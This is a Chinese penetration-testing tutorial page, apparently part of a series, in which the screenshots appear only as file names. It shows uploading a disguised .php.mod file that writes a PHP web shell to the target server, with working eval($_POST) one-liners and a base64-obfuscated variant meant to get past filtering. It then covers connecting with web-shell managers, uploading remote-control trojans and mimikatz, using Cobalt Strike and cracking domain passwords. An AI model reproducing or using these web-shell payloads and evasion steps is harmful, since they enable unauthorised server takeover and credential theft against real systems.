主页 > 网络知识 > 渗透贯穿始终中篇(3)

渗透贯穿始终中篇(3)

20201121174339641.png

导入系统模型

2020112117455343.png

生成一个1.php.mod文件

<?php file_put_contents("shell.php","<?php phpinfo(); ?>"); ?>

20201121174951259.png

访问

20201121175057569.png


获得shell

上传木马root.php.mod

<?php file_put_contents("shell.php","<?php @eval($_POST['root']) ?>"); ?>

20201121175452924.png

报错 

2020112118133937.png

进行编码绕过拦截

<?php
file_put_contents("root.php","<?php
$a=base64_decode("ZXZhbA==")
$a(\$_POST['a']);
?>");
?>

<?php file_put_contents("cao.php","<?php @eval(\$_POST[cmd]); ?>");?>

渗透贯穿始终中篇

菜刀连接

20201122164551510.png

或者冰蝎、中国蚁剑、Weevely等等


打开虚拟终端,执行命令发现是有域环境的

20201122164851311.png

远程控制

上传远程控制木马或者上传mimikaz

20201122172451276.png

开启CS神器

20201122174254188.png

20201122174200860.png

使用CS进行文件管理

2020112218121188.png

破解密码-mimikaz

报错

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!